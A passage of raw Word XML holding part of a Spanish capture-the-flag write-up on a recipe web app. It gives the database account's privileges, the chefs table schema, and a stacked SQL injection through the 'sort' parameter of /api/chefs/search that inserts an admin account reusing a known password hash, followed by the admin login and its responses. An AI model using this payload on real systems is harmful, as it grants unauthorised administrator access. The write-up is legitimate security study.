                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Privilegio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1443" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:start w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:end w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Permitido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="98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SELECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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Sí, demostrado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="98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INSERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="98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UPDATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="98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DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1443" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:start w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:end w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="es-ES" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Aunque la cuenta de la aplicación no podía actualizar usuarios existentes, sí tenía permiso para insertar nuevos registros en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>public.chefs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La estructura relevante de la tabla era:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id             uuid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>username       USER-DEFINED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>password_hash  text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>role           text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>display_name   text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bio            text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>recipes_count  integer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>created_at     timestamptz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> disponía de un valor predeterminado generado mediante </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>gen_random_uuid()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, mientras que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizaba </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>member</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> como valor predeterminado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Esto permitió plantear una nueva estrategia: insertar un usuario con rol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, reutilizando el hash de una cuenta cuya contraseña ya conocíamos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>7. Explotación: creación de un administrador</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Primero se había registrado una cuenta normal:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Usuario: ctf_1792087057</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Contraseña: CtfTest2026!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Rol: member</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Posteriormente se construyó una sentencia SQL para crear una nueva cuenta administrativa copiando el hash de contraseña de ese usuario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Payload utilizado:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>username;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>INSERT INTO public.chefs</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(username, password_hash, role)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SELECT</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'ctf_admin_1792087811',</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password_hash,</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'admin'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>FROM public.chefs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>WHERE username = 'ctf_1792087057';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La inyección se envió a través del parámetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/api/chefs/search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La aplicación respondió:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{"chefs":[]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Esta respuesta, por sí sola, no indicaba si la operación había tenido éxito. Por ello, se verificó la existencia de la nueva cuenta mediante otra consulta SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Resultado:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{   "chefs": [</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"id": null,</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"username": "admin",</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"display_name": null,</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"recipes_count": 0</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 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La respuesta confirmó que el registro insertado tenía rol administrativo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La operación no requirió conocer la contraseña del administrador original, descifrar un hash ni modificar la clave de firma JWT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>8. Autenticación administrativa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A continuación se inició sesión utilizando las credenciales de la cuenta creada:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /api/login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cuerpo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{</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"username": "ctf_admin_1792087811",</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"password": "CtfTest2026!"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Respuesta observada:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{</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"username": "ctf_admin_1792087811",</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"role": "admin",</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"token": "&lt;JWT_VALIDO&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
